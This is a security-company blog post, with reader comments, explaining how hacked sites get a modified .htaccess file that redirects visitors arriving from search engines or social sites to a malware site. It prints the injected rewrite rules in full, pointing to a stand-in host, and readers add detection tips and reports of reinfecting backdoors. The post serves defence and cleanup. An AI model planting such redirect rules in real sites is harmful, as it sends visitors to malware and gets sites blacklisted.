Conditional redirects (or the htaccess malware)

April 13, 2010David Dede

We see all types of malware daily, but one of them seems to cause a lot of confusion to our users (and everyone in general). This is the common question we hear:

“Some users are complaining that when they search for my site on Google, they are redirected to a site full of malware/virus/spam, but when I access, it looks fine. I even scanned it with multiple anti-virus and they didn’t detect anything”

What that means is that someone hacked your site and modified your .htaccess file to redirect users coming from Google to a malware-infested site. Because of that, you end up blacklisted and losing users that can’t reach your site. (well, at least 99% of the time this is the cause).

That’s how the modified .htaccess file looks like:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*gooo?gle.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule .* http://badsite.com [R,L]

On some we even see these conditional redirects if the users are coming from Twitter, myspace, Linkedin, etc:

..
RewriteCond %{HTTP_REFERER} .twitter. [OR]
RewriteCond %{HTTP_REFERER} .blog. [OR]
RewriteCond %{HTTP_REFERER} .live. [OR]
RewriteCond %{HTTP_REFERER} .myspace. [OR]
RewriteCond %{HTTP_REFERER} .linkedin. [OR]
..

The reason most desktop anti virus (or malware scanners) won’t detect that when you scan your files is because they don’t understand the .htaccess file and they won’t follow this redirection. On Sucuri that’s how we would alert:

How to fix it?

Fixing this redirection is very simple, you just need to delete these entries from your .htaccess file (you can have more than one, so check all your directories) and you are set. However, you still have to verify that you don’t have anything else hidden in there, so do a full scan of your web site to make sure you are clean.

In addition to that, you still need to fix the problem that allowed you to get hacked. Most of the time it means updating your web application (WordPress, Joomla, etc), changing your passwords and cleaning your desktop.

As always, if you need help to recover from a malware/hacking attack or need someone to monitor your web site for these issues, visit http://sucuri.net or just send us an email at contact@sucuri.net.

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Pingback: Cleaning SPAM from your Wordpress blog. | Sucuri Security()
Pingback: Cavallo di troia sulla home - AlterVista | Spazio web gratis, hosting free php mysql()
Rafael Torrales

very helpfull, thanks
Pingback: What to do when your site gets blacklisted | Sucuri()
Brent Lagerman

I really love you guys, thanks for fixing up our sites, you provide an amazing service — I’m really happy to have found someone we can trust to remove malware!

brent
@
mimoYmima.com
Jon

Thank you so much !
I was really stressed out and frustrated from getting nowhere with my malware infected site.
Your scanner helped me fix up my site !

Much appreciated
Tim Jeter

this is good information, however my site(s) are infected in this very manner, but cleaning them does not solve the problem. When I download the .htaccess file, clean it, and upload it again, it immediately becomes infected. I download it again and ‘bam,’ infected.

So apparently in my case there is other malicious code that can not only detect when the .htaccess is modified, but actively revert it back to its infected state.

Any ideas?
- Josh
  
  I am also having this issue. When I modify or even remove the htaccess file(s), they reappear moments later with the offending code. Any advice?
  - Erika
    
    this also happened to me. I’ve removed almost everything I had up on the site. I have a subdomain with no .htacces and no index.php and I’m now seeing this redirect there.
  - rectorgroup LT
    
    Firstly download all infected ftp to your computer, with nodepad++ find all files with this “<?php @error_reporting(0); if". thn delete them, after you will done it, delete malware from .htacces. Delete all your old ftp, and upload fixed ftp. Done 🙂
Guestas

I had the same problem, very confusing I’d say. Thanks for info!
joell lapitan

it is not on htaccess
joell lapitan

it is in the htaccess.. sorry
Roelf

thank you so much, can I change the atributes of the .htaccess file to 444 or is it not advisable?
I have changed it to 444 and it seem to work.
webbinit

I have the same issue as below. Remove the infected htaccess file and upload new fresh one and straight away it’s infected again. Not sure what to do???
- sushant
  
  i have the same problem there is a file.htaccess if i delete it it get back if few seconds and this is spread in my whole hosting account means every directroy
  - Joe
    
    Yup same here. A bunch of .htaccess files are being created under every folder and when they get deleted, after a bit seem to recreated. I would love to know how that script or malicious file got in my website directory and how to get rid of it! ugh, basically took down all my websites. Anyone with ideas, please chime in!
    - Sushant Garg
      
      ok, when i got this problem i find a backdoor in my website.
      please try to find it i found joomla 1.5 back door in images folder
    - dante_hwd
      
      Hi,
      I just cleaned out the third site with this issue.
      What is happening is that a file/page was injected into your site. This page gets called from the outside every x minutes (in my last case it was 15 minutes) and it will overwrite any .htaccess it can find.
      The only way out of this is to find the page first, remove it and then get rid of the affected .htaccess. Of course the challenge then is to identify how the page got in.
      Good luck
CERO

I had another variant of this thing infecting my site.. The culprit was IP

37.59.62.209 accessing the IMAGES FOLDER.. check for weird PHP files here.. in my case.. there were 2 PHP files.. one in the STORIES directory… that had a codified code similar as the shown in this page (I suppose to download the latest malware) and the other in /images/banners/.cache_s75tfl.php Note that the behavior is VERY SIMILAR.. i found this file due of it constantly creating the .log file.. I am still not sure if I cleaned my server completely.
Brian Ducharme

I had this problem infect my server from a Joomla website that was not up-to-date. I cleaned it from all the websites except for 1 which I can not find the issue. It is just a plain HTML website, no PHP files, no .htaccess file, no javascript, but when I run it through the scans it comes back as redirecting to malware sites. Any ideas? I’m at a loss. The site is cookeassociates.net.